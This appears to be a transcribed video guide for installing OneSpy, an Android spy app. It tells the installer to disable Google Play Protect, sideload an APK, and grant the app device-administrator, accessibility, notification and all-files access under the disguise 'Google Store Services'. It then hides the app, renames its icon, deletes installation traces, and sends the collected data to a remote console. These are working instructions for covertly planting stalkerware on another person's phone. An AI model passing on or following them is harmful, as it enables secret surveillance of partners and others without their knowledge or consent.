Welcome to the OneSpy Installation Guide. Open the Google Play Store. Tap on Account icon on top right corner. Select Play Protect from menu option. Tap on Setting icon on top right corner. Turn off Scan Device for security threads and improve harmful app detect. A dialog will appear. Tap on Turn Off. Open any browser and type the URL 2sapp.co in the URL and hit Enter. Please wait until the page completely load. Find the activation code field and input your activation code. Wait for a while. A pop-up will appear. Tap on Download and application begins downloading. Once downloading is over, click to open and tap to install. After installation, launch the app. Allow the permission dialog. Choose your desired language and press on Next tap on Allow to enable the permission. Click on Download button to download the app. Once downloaded, tap on Install button. After installation completed, new app will open automatically. Once the application opens, you will receive several permission dialogs. For each permission, tap on Allow. Allow while using the app, or Allow all as appropriate. Enter the activation code and hit Activate button. Tap on Allow and select Allow all the time. Click on Allow to enable management of all files. Tap on Activate button to activate the device as administrator. Disable the notifications by tapping on Allow button. To enable restricted permissions, tap on Installed App and select Google Store Services from the list. Click to enable and press OK. Tap the back button to return the app installation process. Tap on Allow button, choose Google Store Services from list. Tap on three dots from top ridge corner and select Allow Restricted Settings. Enter your device password, then tap the back button twice. Grant Appear on Top Permission by tapping on Allow button. Grant Usage Access Permission by tapping the Allow button and enable the permission switch for Google Store Services. Grant Notification Access Permission to the app by tapping the Allow button. Then on the switch for Google Store Services, a dialog will appear. Tap on Allow button. Tap on Allow button. Select Background Usage Limits. Turn off Put Unused Apps to Sleep. Click on three dots from top right corner. Select Adaptive Batter and turn it off. Hit back button twice to return the app installation process. Grant Accessibility Permission by tapping on Allow button. Select Installed Apps. Find Google Store Services from the list, then turn on the permission switch. If you want to hide the app, just click on OK. And you can also change the app icon and name by your choice. After select app name and icon, a dialog will appear by asking, do you want to remove traces of app? Tap on Yes to delete the installer application and downloaded APK file from Downloads folder. Once app installation is done, you can monitor the data by visiting console.theonespy.com. Thanks for watching.